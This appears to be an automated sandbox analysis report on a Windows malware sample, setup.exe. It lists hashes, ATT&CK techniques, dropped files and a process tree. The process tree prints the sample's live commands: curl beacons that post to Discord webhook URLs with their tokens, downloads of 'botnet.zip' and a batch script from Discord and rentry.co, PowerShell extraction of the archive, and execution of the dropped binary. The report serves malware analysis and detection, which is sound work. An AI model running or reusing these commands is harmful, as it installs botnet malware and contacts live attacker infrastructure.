2e7dec5db09f94639381215051c55c01535a90c309942e789a736e96e0b60f7b

General

Target

setup.exe
Size

90KB
MD5

c6e5a3cde0b24500707a24999a9d4d51
SHA1

2945e204907db886a3697ab688afb0c8f3586ae8
SHA256

2e7dec5db09f94639381215051c55c01535a90c309942e789a736e96e0b60f7b
SHA512

67cf148a2e577f849989087d70a6c7db18daf3c4458d7c00636c614b7cb71a667fa4a19d3d4b05141927e8696e73c39fe597b99ee232d46d2e9f369985937e9e
SSDEEP

1536:j7fbN3eEDhDPA/pICdUkbBtW7upvaLU0bI5taxKo0IOlnToIfhwSROa:/7DhdC6kzWypvaQ0FxyNTBfhnb

Score

7^/10

Malware Config

Signatures

Executes dropped EXE 1 IoCs

pid	Process
3580	forvmbox.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2200	powershell.exe
2200	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2200	powershell.exe

Suspicious use of WriteProcessMemory 23 IoCs

description	pid	Process	procid_target
PID 1712 wrote to memory of 3000	1712	setup.exe	82
PID 1712 wrote to memory of 3000	1712	setup.exe	82
PID 3000 wrote to memory of 684	3000	cmd.exe	83
PID 3000 wrote to memory of 684	3000	cmd.exe	83
PID 3000 wrote to memory of 4468	3000	cmd.exe	84
PID 3000 wrote to memory of 4468	3000	cmd.exe	84
PID 3000 wrote to memory of 2200	3000	cmd.exe	91
PID 3000 wrote to memory of 2200	3000	cmd.exe	91
PID 3000 wrote to memory of 3580	3000	cmd.exe	98
PID 3000 wrote to memory of 3580	3000	cmd.exe	98
PID 3000 wrote to memory of 3580	3000	cmd.exe	98
PID 3000 wrote to memory of 1708	3000	cmd.exe	101
PID 3000 wrote to memory of 1708	3000	cmd.exe	101
PID 3580 wrote to memory of 1980	3580	forvmbox.exe	100
PID 3580 wrote to memory of 1980	3580	forvmbox.exe	100
PID 1980 wrote to memory of 4912	1980	cmd.exe	102
PID 1980 wrote to memory of 4912	1980	cmd.exe	102
PID 3000 wrote to memory of 2160	3000	cmd.exe	103
PID 3000 wrote to memory of 2160	3000	cmd.exe	103
PID 3000 wrote to memory of 1800	3000	cmd.exe	104
PID 3000 wrote to memory of 1800	3000	cmd.exe	104
PID 1980 wrote to memory of 396	1980	cmd.exe	105
PID 1980 wrote to memory of 396	1980	cmd.exe	105

C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1712
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\7CF0.tmp\7CF1.tmp\7CF2.bat C:\Users\Admin\AppData\Local\Temp\setup.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3000
- - C:\Windows\system32\curl.exe
    curl -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"Admin Connected to the API\"}" https://discord.com/api/webhooks/1143935323655634964/7Tdk2BNleWb0ZkJSiY1uuNDzNoj9ArVcuUoX6DPp_ZZitmO1VYj9jLFtdI83CxGCWsTC
    3⤵
    PID:684
- - C:\Windows\system32\curl.exe
    curl -o botnet.zip https://cdn.discordapp.com/attachments/1141139274176155688/1143684627261820988/botney.zip
    3⤵
    PID:4468
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Expand-Archive -Path 'botnet.zip' -DestinationPath 'C:\Users\Admin\Desktop'"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2200
- - C:\Users\Admin\Desktop\forvmbox.exe
    forvmbox.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:3580
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\E02E.tmp\E02F.tmp\E030.bat C:\Users\Admin\Desktop\forvmbox.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1980
    - - C:\Windows\system32\curl.exe
        
        curl -s -o op.bat https://rentry.co/nfago/raw
        5⤵
        
        PID:4912
    - - C:\Windows\system32\curl.exe
        
        curl -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": null, \"embeds\": [{\"title\": \"Attack :=: 13:58:40.11 {}\", \"description\": \" Mon 07/03/2023-13:58:40.11 / \",\"color\": 1127128,\"author\": {\"name\": \"MLBOT BOTNET API LOG\",\"icon_url\": \"https://cdn.discordapp.com/attachments/353651119685107714/1078725179850637372/danger_death_head_internet_security_skull_virus_icon_127111.png\"}}],\"attachments\": []}" https://discord.com/api/webhooks/1140675610524532868/T1taUTk6bStR2J1f9uoXFj7PQAMLD1T1yXMewAm481PLreURT2PLhzfvxpkEb4JO9VJy
        5⤵
        
        PID:396
- - C:\Windows\system32\curl.exe
    curl -s -o C:\Users\Admin\Desktop\attaks\methods\list.txt https://rentry.co/httpslist/raw
    3⤵
    PID:1708
- - C:\Windows\system32\curl.exe
    curl -s -o C:\Users\Admin\Desktop\attaks\methods\tlsv\proxy.txt https://rentry.co/httpsproxy/raw
    3⤵
    PID:2160
- - C:\Windows\system32\curl.exe
    curl -s -o C:\Users\Admin\Desktop\attaks\methods\http.txt https://rentry.co/httpsproxy/raw
    3⤵
    PID:1800

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1148

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\7CF0.tmp\7CF1.tmp\7CF2.bat

Filesize
1KB

MD5
762a94fd24e4f9f357b00419eea3ae82

SHA1
b134ea18dcfc75283a8f154e3f0acaf55d515b20

SHA256
960a1d40361818e6b888fdd3734cf0de1356a470dbb7528a218644ccf9e1f74d

SHA512
6c05121d2c18ce7a12605597a12a7f6427a81741571d79f3b183d51635e28139a1b51a5dad8d6d54aa01ea5b943d8a91c94ae556899b3bb2684f072af09eeb32

Download Submit
C:\Users\Admin\AppData\Local\Temp\E02E.tmp\E02F.tmp\E030.bat

Filesize
3KB

MD5
d5f935d0b2ddc1212f762ebe21bcb2ae

SHA1
59a320dce6123484a146bcdeac43277b39ca03cb

SHA256
7a68493dbb79471fc0fa27ab7f57380d199fff07c881588c72819426c5c740d7

SHA512
14864ebedaa6c1a6773dc768d9d5d3ed7f102d2aaaa6f09f32f5ee9a75ab738a256ca686c7b3e2f3b65e632610bff6e8cc26da10732b2546863cb94ec84fb76d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_m1si0qrk.ycb.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\Desktop\attacks\methods\https.exe

Filesize
35.9MB

MD5
70228b5cd219e39ddf20122c56b3866f

SHA1
c3120ad1ca629d707a7220963ad2326c2b096f37

SHA256
a5538de4385e4c1869e63cd3094e8d43efbae23377c153d9ef9ff772f169cfb5

SHA512
bae73c538df3d574451963942048e639f8a1811e0498fd741dc23510dc0702ba5f6553381e81947e9da45059c8b2eda8db75e03dba54dea486c8c87c29a50654

Download Submit
C:\Users\Admin\Desktop\attacks\methods\tlsv\.git\logs\refs\remotes\origin\HEAD

Filesize
186B

MD5
bfd3d0748ac3a838d224d452d6d5959f

SHA1
9506c3eba5b8fa602290a75597e2ef720767c5d6

SHA256
84ec21b7d8415b974e444e6e230a68a934719a7da452eb0f21ff4ff716e13ba5

SHA512
bef9d23bf2a0a5811c51684e933dba127f817a8dc4b7a0deedbc53af9beb64ab245dfa722b94f10defcbe311b448a6e593173639adb4069d076104ad6848a680

Download Submit
C:\Users\Admin\Desktop\botnet.zip

Filesize
102.2MB

MD5
5bb85a31212764a644641bae9c63335e

SHA1
595e8e7df7c8a1fd1c1bbbb973c747810ee46a37

SHA256
94cb34780ec0e193eff4dc120c09d4d2d4d87b0af48c853e4b6c7a9fd4deeb7e

SHA512
ddecf2be9bbaab3a2f93a571877e36a98fec7bfb64516646053e272fa22000183da6f865d2dc7be2af92ee480131e05d23d34efa838ca1bd15a48269551b8002

Download Submit
C:\Users\Admin\Desktop\forvmbox.exe

Filesize
92KB

MD5
8c661213d9bbfb8a9a3d42c6b6cb7059

SHA1
9f795650dfbac6f49896026b047d16f3a0c16ec9

SHA256
3a02fcf8821a21bafcdc5273eccce353036dd48ffd5c5f91a1d47e5a9fa243ce

SHA512
d21b5b738857535c6eb181636ab78c08d872d33b5b18dff50ab694f6d1afe335db321767720a0a5ab056c3c03e98195dd4086f7eb8e21abf25ff3c0ac75bf0d4

Download Submit
C:\Users\Admin\Desktop\forvmbox.exe

Filesize
92KB

MD5
8c661213d9bbfb8a9a3d42c6b6cb7059

SHA1
9f795650dfbac6f49896026b047d16f3a0c16ec9

SHA256
3a02fcf8821a21bafcdc5273eccce353036dd48ffd5c5f91a1d47e5a9fa243ce

SHA512
d21b5b738857535c6eb181636ab78c08d872d33b5b18dff50ab694f6d1afe335db321767720a0a5ab056c3c03e98195dd4086f7eb8e21abf25ff3c0ac75bf0d4

Download Submit
memory/2200-40-0x00007FF9BDEB0000-0x00007FF9BE971000-memory.dmp

Filesize
10.8MB

Download
memory/2200-18-0x0000024F46DC0000-0x0000024F46DCA000-memory.dmp

Filesize
40KB

Download
memory/2200-14-0x0000024F44B40000-0x0000024F44B50000-memory.dmp

Filesize
64KB

Download
memory/2200-16-0x0000024F44B40000-0x0000024F44B50000-memory.dmp

Filesize
64KB

Download
memory/2200-45-0x0000024F44B40000-0x0000024F44B50000-memory.dmp

Filesize
64KB

Download
memory/2200-46-0x0000024F44B40000-0x0000024F44B50000-memory.dmp

Filesize
64KB

Download
memory/2200-47-0x0000024F44B40000-0x0000024F44B50000-memory.dmp

Filesize
64KB

Download
memory/2200-13-0x00007FF9BDEB0000-0x00007FF9BE971000-memory.dmp

Filesize
10.8MB

Download
memory/2200-159-0x00007FF9BDEB0000-0x00007FF9BE971000-memory.dmp

Filesize
10.8MB

Download
memory/2200-17-0x0000024F47060000-0x0000024F47072000-memory.dmp

Filesize
72KB

Download
memory/2200-15-0x0000024F44B40000-0x0000024F44B50000-memory.dmp

Filesize
64KB

Download
memory/2200-12-0x0000024F46DF0000-0x0000024F46E12000-memory.dmp

Filesize
136KB

Download

Analysis

Sharing